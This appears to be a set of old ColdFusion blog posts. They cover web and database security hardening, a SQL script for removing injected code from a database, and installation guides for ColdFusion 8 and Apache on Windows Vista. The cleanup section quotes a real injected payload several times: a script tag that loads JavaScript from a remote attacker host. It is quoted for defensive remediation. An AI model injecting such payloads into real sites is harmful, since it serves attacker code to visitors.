Every seasoned developer will know that protecting your website from a hacker is a top priority, whether for your own reputation or for maintaining your company’s reputation and log-term revenue prospects.

Why should you be worried about security?

The Web is changing many of the assumptions that people have historically made about computer security and publishing. As the Internet makes it possible for web servers to publish information to millions of users, it also makes it possible for computer hackers, crackers, criminals, vandals, and other “bad guys” to break into the very computers on which the web servers are running. Once subverted, web servers can be used by attackers as a launching point for conducting further attacks against users and organisations.

It is considerably more expensive and more time-consuming to recover from a security incident than to take preventative measures ahead of time.

This blog post started on the premise of protecting your website from a SQL Injection Attack. However, it is also appropriate to discuss, at a relatively high level, how to secure your server architecture and applications.

Server-Level Security

• Separate web- and database-servers on to different physical machines.
• Secure the web- and database-servers with traditional techniques. Only authorised accounts should have the capabilities to run tasks on the machine. That means not giving admin-rights to the user account.
• Keep servers up-to-date with the latest patches and software releases.
• Minimise the number of services running on the server. This means limiting the services to only those required for the web- or database-servers to function.
• Secure information in transit between servers. This may mean physically securing the network to prevent evesdropping via encryption or obfuscating the data amongst innocuous ‘noise’.
• Secure the database server behind a firewall.

Application-Level Security

• Separate ColdFusion, the webserver and database server user accounts. They should never be under the same system account.
• Create a database user specifically for your ColdFusion datasource and restrict it to only the activities required for the application. The user should not have database-owner rights, access to databases not relating to the application or access to the system tables.
• Revoke privileges in the ColdFusion datasource definition to prevent the SQL commands CREATE, DROP, GRANT, REVOKE and ALTER.
• General settings in the ColdFusion Administrator:
  • Check the Disable access to internal ColdFusion Java components option.
  • Check the Enable Global Script Protection option.
  • Add a Missing Template Handler.
  • Add a Site-wide Error Handler.
  • Reduce the Maximum size of post data from 100MB.
  • Enable Timeout Requests, and set to 60 seconds or less.
  • Disable Robust Exception Handling on production servers.

Code-Level Security

• Application.cfc - Set the scriptProtect Application variable to true to enable application-wide cross-site script protection.
• CFQueryParam - This tag, importantly, verifies the data type of a query parameter and, for RDBMSs that support bind variables, enables ColdFusion to use bind variables in the SQL statement. Bind variable usage enhances performance when executing a cfquery statement multiple times.

  <cfquery name="qry" datasource="#APPLICATION.dsn#">
  SELECT column1, column2, column3
  FROM tableName
  WHERE column4 = <cfqueryparam value="#variable1#" cfsqltype="cf_sql_bit" />
  AND column5 LIKE <cfqueryparam value="%#variable2#%" cfsqltype="cf_sql_varchar" maxlength="200" />
  AND column6 IN (<cfqueryparam value="#variable3#" cfsqltype="cf_sql_integer" list="true" />)
  </cfquery>

  There are limitations to the use of the cfqueryparam tag. In ColdFusion 7 for example, you cannot use them in queries using the cachedWithin attribute. Similarly, they cannot be used in ORDER BY clauses, although the use of conditional logic should resolve the need for order by variables.

• Functions - As a rule of thumb, validate all the data being passed into a query prior to it being used. ColdFusion MX 7 saw the introduction of the isValid() function. This function tests whether a value meets a validation or data type rule and can be used to replace a large number of type-specific functions such as isArray(), isBinary(), isBoolean(), isDate(), isNumeric() and isSimpleValue() etc.
• Stored Procedures - I often favour the use of stored procedures over standard queries. Not only do they add an additional level of performance, they provide an additional level of security; ColdFusion does not do any raw processing of queries in the web code, it simply passes variables down the wire to the database server.

Additional Resources

• Web Security, Privacy and Commerce
• O’Reilly’s The Web Application Hacker’s Handbook
• Adobe’s whitepaper - ColdFusion 8 Developer Security Guidlines (PDF, 281k)
• Adobe’s whitepaper - ColdFusion 7 Developer Security Guidlines (PDF, 217k)
• Adobe DevNet - Learning Stored Procedure Basics in ColdFusion 8
• 0×000000 # The Hacker Webzine’s article on Attacking ColdFusion
• Three part series from Mark Kruger (ColdFusion Muse) - Part 1, Part 2, Part 3
• Brad Wood’s article on CFQueryParam is not just for security.

In my previous post, What is a SQL Injection Attack, I gave a brief overview of SQL injection and Cross-Site Scripting (XSS), primarily with regard to websites. In the example given, we saw that an attack could take the form of a ‘hacked’ URL which contained either a literal SQL statement, or a hexadecimal string that could be interpreted by an insecure SQL database server.

Which ever method is used to inject SQL and ultimately dangerous scripts into the database, we need to know how to deal with the problem and ‘roll it back’ to a safe state.

If you have an up-to-date backup of the database prior to the attack, then restoring the database is the best course of action. If this is not the case, apart from giving yourself a kick for not implementing a backup policy, it is possible to programatically remove the injected string or code using a set of relatively-simple SQL queries.

Programatically Replace Injected Code

Fortunately, by the very nature of an XSS attack, code is appended to the data already in the database — rather than replacing it — which means we simply need to remove the appended content.

Taking a real-world example, below is string that was injected into the database:

"></title><script src="http://1.verynx.cn/w.js"></script><!--

When rendered by a standard HTML page, the string is either displayed to the user agent, or the JavaScript file is called by the page, causing a security threat.

With the example above, we can use the following script to recurse through and create update scripts for every ‘infected’ table and column (of the type char, nchar, varchar and nvarchar), in the database.

SELECT 'UPDATE [' + table_name + '] 
SET ' + column_name + ' = REPLACE(CAST(' + column_name + ' as varchar(8000)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''') 
WHERE ' + column_name + ' LIKE ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--%''' 
FROM information_schema.columns 
WHERE (character_maximum_length IS NOT NULL) 
AND ([table_name] NOT LIKE 'dt%') 
AND ([table_name] NOT LIKE 'sys%')

The resultset then produces update statements that look like the following (I have masked the actual table and column names):

UPDATE [tableName]   
SET columnName = REPLACE(CAST(columnName AS VARCHAR(8000)), '"></title><script src="http://1.verynx.cn/w.js"></script><!--', '')   
WHERE columnName LIKE '%"></title><script src="http://1.verynx.cn/w.js"></script><!--%'

These update statements can be copied into and run in a program such as Query Analyser for Microsoft SQL Server 2000, or SQL Server Management Studio for Microsoft SQL 2005.

If the actual code that was injected is different, simply change the above code to suit your needs.

You can download the SQL rollback script for your own needs.

Prevent a Successful Attack

As the popular idiom goes prevention is better than a cure, I will discuss in my next post how to mitigate against SQL Injection attacks — on ColdFusion-based websites — before they become a problem.

After installing ColdFusion 8 and Apache successfully you may still see an “HTTP 500 Internal Server Error” when navigating to a ColdFusion page. All is not lost, you simply need to configure, or check the configuration of Apache.

Apache requires very little post installation modification, but it is always good practice to check the httpd.conf file to ensure that the ColdFusion “install” scripts did what they were supposed to do.

If you haven’t confirmed that Apache is running, open your browser and point it to http://localhost/ (unless you specified a real URL during installation). You should see the Apache test page. If you see an error, review the Apache installation steps to make sure you followed all the steps correctly, and/or check your log files for more detailed errors.

Now we know Apache is running, but how about ColdFusion? Point your browser to the ColdFusion Administrator found commonly at http://localhost/CFIDE/administrator/index.cfm and see what happens. One of three possible failures could occur:

1. Your browser prompts you to save the .cfm file to your computer. There a couple of possible resolutions to this. Firstly restart the Apache service. If this does not resolve the issue you will need to check the httpd.conf file to ensure that the ColdFusion module is being loaded. The file can typically be found in the C:\Program Files\Apache Software Foundation\Apache2.2\conf\ directory.
   Make sure that the DirectoryIndex has a reference to the index.cfm file (i.e. the default file):Ensure that the LoadModule jrun_module "C:/ColdFusion8/runtime/lib/wsconfig/1/mod_jrun22.so" is also present:

   

   If you need to edit this file, restart the Apache service after you have saved the changes.

2. You get a message that the CFIDE folder cannot be found. This is more likely to be a problem with where you placed the ColdFusion application during install. The default location is in the Apache directory (C:\Program Files\Apache Software Foundation\Apache2.2\htdocs), so check in the http.conf file to ensure the DocumentRoot is pointing correctly. Alternatively, copy this folder to your localhost webroot (e.g. C:\WebRoot) ensuring that the DocumentRoot points to your webroot (see the yellow box in the second screen-shot).
3. You get another message which probably means that you need to reinstall ColdFusion, and/or Apache!

And that is it, you can start using ColdFusion and developing applications.

A few months ago I posted an article on Installing Apache on Vista, and it proved to be extremely popular. It appears that I was not the only one who found it a non trivial matter.

Now it is the turn of ColdFusion 8. ColdFusion 8 as we well know is the latest and greatest incarnation of the ColdFusion platform from Adobe. It has a lot of great new features such as cfimage, cfzip, cfexchange, some contentious features such as cfthread and cfinterface, and some not-so-necessarily-cool new “Web 2.0″ features such as cffeed and cfajax. But since this article isn’t about any of these, I better stick to the topic.

Like my article on installing Apache, installing ColdFusion on Vista is again not a trivial matter and involves only what can colloquially described as a “shed load of steps”. I’m probably being a little harsh towards ColdFusion as many of the problems I encountered were more closely related to Apache than ColdFusion.

NB: This article will assume that you have pre-installed Apache (although you could use IIS if so compelled), turned off Vista’s User Account Control (UAC), disabled any firewalls you have installed and finally, but most importantly, you have downloaded ColdFusion from the Adobe website.

Let us begin.

1. Find where you downloaded your copy of the ColdFusion Installer. Right-click on the executable file and specify to “Run as Administrator”. The installer should start and you should see the screenshot below. Select “English”, or which ever your language preference is, and Click “OK”.

   

2. The ColdFusion Installation progress screen may or may not be briefly displayed.

   

3. The Introduction screen will be displayed. Click “Next”.

   

4. The License Agreement screen will then be displayed. Agree to the “I accept the terms of the License Agreement” and Click “Next”.

   

5. The Install Type screen is then displayed. You don’t need to enter a serial number unless you are installing this into a production environment. Check “Developer Edition” and Click “Next”.

   

6. The Installer Configuration screen should be displayed. Since we already have Apache 2.x installed as our web server (if you want to use IIS, you will need to skip steps 11.1 and 11.2), check “Server configuration” and Click “Next”.

   

7. The Sub-component Installation screen should be displayed. This is one of the noticeable changes from version 7 to version 8 of ColdFusion. Hovering your mouse over each sub-component will describe in more detail what each sub-component does. If you plan to integrate .NET (especially with WebServices) or carry out Flex development then make sure that the “.NET Integration Services” and “LiveCycle Data Services” items are checked. For simplicities sake, check everything and Click “Next”.

   

8. The Select Installation Directory screen should be displayed. The default directory for a Serverconfiguration will be “C:\ColdFusion8″ on a Windows machine. Click “Next” to continue.

   

9. As you have chosen to install LiveCycle Data Services, you will need to agree to a further Licence Agreement screen. Click “Next”.

   

10. The Adobe Livecycle Data Services ES Installation screen is displayed. You will need to enter a serial number into this screen for production environments. Since I am going to assume a development environment, simply click “Next”.

    

11. The Configure Web Servers / Websites screen should be displayed. This is the point where we want to connect ColdFusion with Apache. By default “Configure web server connector for ColdFusion” is checked. We need to add Apache so Click “Add”.

    

    1. The Add Web Server Configuration screen is displayed, choose Apache from the drop-down.
    2. Add the relevant Apache directory paths, e.g.:

       

       1. The Configuration Directory C:\Program Files\Apache Software Foundation\Apache2.2\conf
       2. The Server Binary Directory C:\Program Files\Apache Software Foundation\Apache2.2\bin\httpd.exe
12. The Review Configured Web Server screen is then displayed. If all the settings are correct, click “Next”.

    

13. The Choose Adobe ColdFusion 8 Administrator Location screen should be displayed. Since we are using Apache for our web server then the default Directory should be pointing to C:\Program Files\Apache Software Foundation\Apache2.2\htdocs. You can alternatively point this to C:\WebRoot or wherever you have set up your web project files. Select “Next”.

    

14. The Adminstrator Password screen is then displayed, prompting for a password. Enter one, remember it (!!) and click “Next”.

    

15. The Enable RDS & Password screen is then displayed. If you want to use this, check the box and provide an additional password. Don’t use RDS in a production environment. Click “Next”.

    

16. The Pre-Installation Summary screen is then displayed, detailing your configuration. This is your last chance to go back and make changes. If everything is OK, click “Install”.

    

17. The Installing Adobe ColdFusion 8 screen is then displayed, showing a host of marketing messages.

    

18. The Please Wait screen is displayed, and be prepared to wait!

    

19. The Installation Complete screen is finally displayed and indeed the installation is complete. Now for the configuration! Click “Done”.

    

20. Configuration and Settings Migration Wizard. Open up a browser and enter the url http://localhost/CFIDE/administrator/index.cfm to begin the ColdFusion 8 Configuration and Settings Migration Wizard. Enter your password and Click “Login”.

    

21. ColdFusion will now begin Configuring Server, which could take any number of minutes to complete.

    

22. Once the Configuration Complete is displayed, you can login to the ColdFusion Administrator and start working, or playing, with the new interface, settings and Server Monitor.

    

So, that only 22 steps! That may be the longest installation process you may go through, but the power now at your finger tips to produce hugely interactive websites is a compelling reason why to choose this version of ColdFusion, or indeed ColdFusion over other products.

Following the purchase of a spangly new Toshiba laptop running Vista, and not one for making life simple, I decided not to run my development environment on IIS7, but rather, I wanted to install the latest version of Apache.

Installing Apache under Windows XP was relatively trivial. This is not the case under Windows Vista. The creation of the Apache service fails, but not overtly. Furthermore, the all-important conf directory can™t be set up by the installer, probably due to user permission problems.

I finally got it working with the following procedure. I used the latest version of Apache (2.2.4) and Windows Vista Business Edition.

1. Uninstall any previous installations of Apache Web server (Start > Control Panel > Programs and Features).
   Make sure that all old Apache folders are also removed (e.g. like C:\Program Files\Apache Software Foundation\…).
2. Turn off your firewall via the Control Panel.
3. Stop User Account Control (UAC).
4. Get the most recent version of Apache from http://httpd.apache.org/ and put it on your desktop, or folder of your choosing. The file I used was called apache_2.2.4-win32-x86-no_ssl.msi, but for ease, it is a good idea to rename the install file to apache.msi.
5. Start > All Programs > Accessories Right-Click Command Prompt and choose œRun as Administrator.
6. Via the command prompt, navigate to the folder in which the apache.msi install file is located.
7. Type msiexec /i apache.msi on the command prompt.

   

8. Run through the Apache installer.

   

   

   

   

   

   

   

   

   

9. I™m running it as a development server, so I left the domain as “localhost”.
10. Choose the default server on port 80 for all users option.
11. The default installation directory is C:\Program Files\Apache Software Foundation\Apache2.2\, but again for ease, you could change the installation directory to C:\Apache.
12. Reboot your computer.
13. The little Apache feather icon won™t appear on the task bar under Vista with the present version of Apache (2.2.4). To remove the œerror box that says blank or “the operation completed successfully on startup, go to All Programs > Startup, and remove the “Monitor Apache Servers” item there.
14. Browse to http://localhost. It should say “It works!” If it doesn’t, panick, or check your httpd.conf file by going to All Programs > Apache HTTP Server 2.2.x > Configure Apache Server > Test Configuration. Follow the directions for fixing the configuration file.
15. Turn your firewall back on.
16. Turn UAC back on too, if you like to be constantly bugged by control messages!

Good luck!